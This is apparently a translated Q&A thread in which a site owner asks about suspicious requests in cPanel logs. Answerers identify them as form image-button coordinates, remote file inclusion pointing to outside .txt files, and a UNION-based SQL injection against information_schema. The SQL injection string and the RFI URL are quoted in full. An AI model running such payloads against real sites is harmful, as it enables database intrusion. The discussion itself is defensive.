这是注射尝试还是正常请求?

时间:2010-05-04 17:38:38

标签: php request sql-injection

在cPanel的Analog Stats统计模块中,我注意到无数请求连接到以下示例:

/?x=19&y=15

数字是随机的,但它总是设置x和y变量。

另一类神秘请求:

/?id=http://nic.bupt.edu.cn/media/j1.txt??

在请求日志中还有其他尝试注入,也有直接的sql写入它们。例如:

 /jobs/jobinfo.php?id=-999.9 UNION ALL SELECT 1,(SELECT concat(0x7e,0x27,count(table_name),0x27,0x7e) FROM information_schema.tables WHERE table_schema=0x73636363726F6F745F7075626C6963),3,4,5,6,7,8,9,10,11,12,13--

看起来他们都达到了404,但我仍然想知道这些背后的意图。

我知道这很模糊,但也许有人知道这是正常的,而使用cPanel& phpMyAdmin服务。此外,网站上安装了一个搜索框,这可能就是原因。

有关所有这些是什么的任何建议?

<小时/> 编辑

我将所有这些从请求列表中删除,并切掉了他们指向的txt。也许这为这些攻击提供了更多的帮助。

http://www.diakonia-jkt.sch.id
http://www.nationalmedecine.com
http://muzykologia.lublin.pl
http://www.abi.co.uk
http://stul.netsolutions.cz
http://jack.tiscali.it
http://solid.go.ro
http://nic.bupt.edu.cn
http://www.europeanforumcyprus.eu
http://www.nationalmedecine.com

此外,在phpMyAdmin状态部分,它显示每小时约900次更改数据库查询。只有select privs的用户是否可以对db造成任何实际损害?没有个人信息,但这些SOB正在堵塞带宽。

4 个答案:

答案 0 :(得分:5)

这些(除了前一个)是自动的(?)试图找到代码中的弱点;

/?ID = http://nic.bupt.edu.cn/media/j1.txt ...

尝试从其他服务器导入PHP页面。一个众所周知的问题,尤其是旧的PHP软件。

“UNION ALL SELECT 1”是一个明显的SQL插入尝试。模式ID 0x73636363726F6F745F7075626C6963解码为“scccroot_public”。我不确定这是哪个数据库。但他们正试图控制它,这是肯定的。

答案 1 :(得分:4)

x=19&y=15看起来您的网站上有method=get和输入type=image的表单。你是否记录推荐人?

答案 2 :(得分:3)

/?x=19&y=15可以代表<input type="image" />

答案 3 :(得分:0)

/?ID = http://nic.bupt.edu.cn/media/j1.txt?看起来像某种跨站点的东西,一个无用的东西,因为它加载一个纯文本文件O_O